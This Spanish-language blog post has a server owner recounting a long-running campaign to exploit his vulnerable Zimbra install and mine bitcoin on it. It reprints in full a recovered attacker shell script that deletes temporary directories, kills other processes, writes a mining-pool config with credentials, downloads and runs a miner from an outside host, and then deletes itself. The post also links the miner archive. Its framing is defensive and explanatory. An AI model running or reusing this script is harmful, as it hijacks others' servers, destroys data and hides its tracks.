Minando Bitcoins con vulnerabiliades de Zimbra

Tenía mucho tiempo que alguien no se esforzaba por intentar tomar algo de la cueva del dragón de forma seria, todos los días lo intentan pero la mayoría de los lamers son niños que si no sale el ataque a la primera renuncian. Se dan cuenta muy rápido que están jugando en otra liga.

Sin embargo desde hace mucho tiempo hay alguien que no se ha dado por vencido, si motivación es definitivamente mas “motivadora” no busca fama sino dinero, es un minero de bitcoins que piensa que puede minar bitcoins en la cueva del dragón y es por eso por su ambición que no ha dejado de intentarlo, al principio era un lamersito mas, pero ha investigado, realmente se ha esforzado. Incluso me ha dado ternura y para reconocer su esfuerzo he bajado la dureza de la cueva para que no desista, para que sienta que está avanzando. No se si será la misma persona, pero lo han estado intentando desde Julio del 2013 mucho tiempo y aun no pierde la fe.

El ataque va dirigido a Zimbra que para quien no lo conozca es un groupware que está escrito y soportado en Java, tiene algunas vulnerabilidades que permiten a un atacante ingresar al sistema, incluso hace unos días han salido vulnerabilidades 0day.

El único problema que tiene un atacante con atacar 0day la cueva del dragón es que la cueva del dragón es Anti 0day , de poco o nada sirve tener un exploit que no puedes usar en la cueva del dragón aun sabiendo que la vulnerabilidad está ahí presente.

Recuerden que tengo artículos para hacer servidores inhackeables y otros artículos que podrían hacer que el arte del hackear páginas web o servidores se vuelva obsoleto y frustrante.

En los primeros intentos este atacante inyecto directamente los binarios de un programa de minería de bitcoins, debió ser frustrante darse cuenta que no podía ejecutarlos, por supuesto el servidor de la cueva de inmediato se alerto y me mando mensajitos de Oye Dragón , ya viste lo que hace este hackersito… y si fui a ver , vi el ataque como un fracaso total. Por supuesto que el Zimbra está vulnerable, pude decidir simplemente desinstalarlo o actualizarlo. El problema es que si lo desinstalaba el juego terminaría, es la única vulnerabilidad que permite “ejecutar” cosas dentro del servidor. Por supuesto mi preocupación es igual a CERO, para los que llevan años leyéndome saben que cada determinado tiempo hago retos en servidores reales donde incluso para ahorrarles el tiempo de buscar un exploit y entrar, yo mismo les entrego acceso directo por telnet o ssh , con cuentas validas, prácticamente servido en bandeja de plata y aun así el reto ha sido muy pocas veces superado y cuando lo fue , fue por un error mío que aunque no vale, cuenta.

El último intento es algo interesante, en lugar de ingresar los binarios que el atacante ya sabía que no se iban a ejecutar decidió enviar Shell script que al no ser un programa binario podría ser ejecutado o mejor dicho interpretado y por medio de ellos lanzar el ataque y por fin ponerse a minar y también tomo medidas para evitar que me diera cuenta, después de lanzar el ataque el script se autodestruye borrándose con el comando rm y efectivamente el script se borra.

Es una pena que detrás de tanto esfuerzo con unos sencillos movimientos del teclado haya resucitado el archivo eliminado cual carta de yugioh sacada del cementerio. El archivo es el siguiente.

#!/bin/bash

# add way to kill the exact name of a "spoofed" proc name of a skiddie

bot..

# rm oldz
rm -rf "/tmp/kpoll"
rm -rf "/tmp/dsys"
rm -rf "/tmp/ksys.cfg"
rm -rf "/tmp/dsys.cfg"
rm -rf "/var/tmp/"

# kill existing procs/could change this to map w/readlink & proc
killall kpoll
killall dsys
killall minerd32
killall minerd64
killall b
kill -9 $(pidof kpoll)
kill -9 $(pidof dsys)
kill -9 `pgrep -f stratum`
kill -9 `pgrep -f java`

# write new conf file
(cat < <- _EOF_ { "url" : "stratum+tcp://mining.eu.hypernova.pw:3333", "user" : "rastamine.zb", "pass" : "908jlk4", "quiet" : true } _EOF_ ) > /tmp/ksys.cfg

# download and exec miner corresponding to arch
ARCH=$(uname -m)
NAME="/tmp/kpoll"

wget -q http://abksprings.co.za/v/m_`uname -m` -O "$NAME"
chmod +x $NAME
eval "$NAME -B -c /tmp/ksys.cfg 2> /dev/null"
chk=`pidof kpoll`
if [ ! -z "$chk" ]
then
echo "$chk"
fi

# once our cmd is in memory there's no need to keep the conf/bin
rm -rf "/tmp/ksys.cfg"
rm -rf "/tmp/kpoll"
rm -rf "/tmp/z.sh" # self destruct :P

Apoco no da ternura en SELF DESTRUCT pone una carita sonriente, seria una pena que el script se ejecuta en un servidor que ha sido asegurado por Last Dragón en persona

Impresionante ¿no? He de reconocer que se ha esforzado mucho, claro que si hubiera leído mi artículo de servidores inhackeables sabría que un servidor de internet recibe conexiones no las inicia, los que inician las conexiones son los clientes por lo que no tiene sentido permitir que una conexión inicie desde el servidor, aunque logro ejecutar su programa de minería desafortunadamente se estrello de cara contra el muro, si contra el firewall.

Pienso en que para reconocer su esfuerzo debería liberar la conexión que quiere del firewall dejarlo que intente minar en mi cueva pero, yo se que no le va a dar tiempo, en unos días tenia y tengo planeado hacer un artículo de cómo respaldar Zimbra OpenSource para actualizarlo y su posterior restauración y al hacer ese artículo pues el Zimbra vulnerable sería reemplazado por uno que no es vulnerable, por eso aunque no quisiera que el juego termine, yo diría que llego a su limite de tiempo, lo deje tratar y tratar por mucho tiempo pero ya es hora de poner fin no por mala gente si no porque quiero escribir un artículo que entra en conflicto con lo que este atacante está haciendo.

Por cierto lo interesante de tener un sitio que es blanco de muchos ataques es que yo mismo no tengo que ir a buscar los exploit, gracias a todos los niños que mientras juegan al hacker me traen xploit que de otra forma yo mismo tendría que ir a buscar.

El programa de minería si alguno le interesa es el siguiente. Mineria.tgz

6 Comments

Add a Comment

Comment spam protected by SpamBam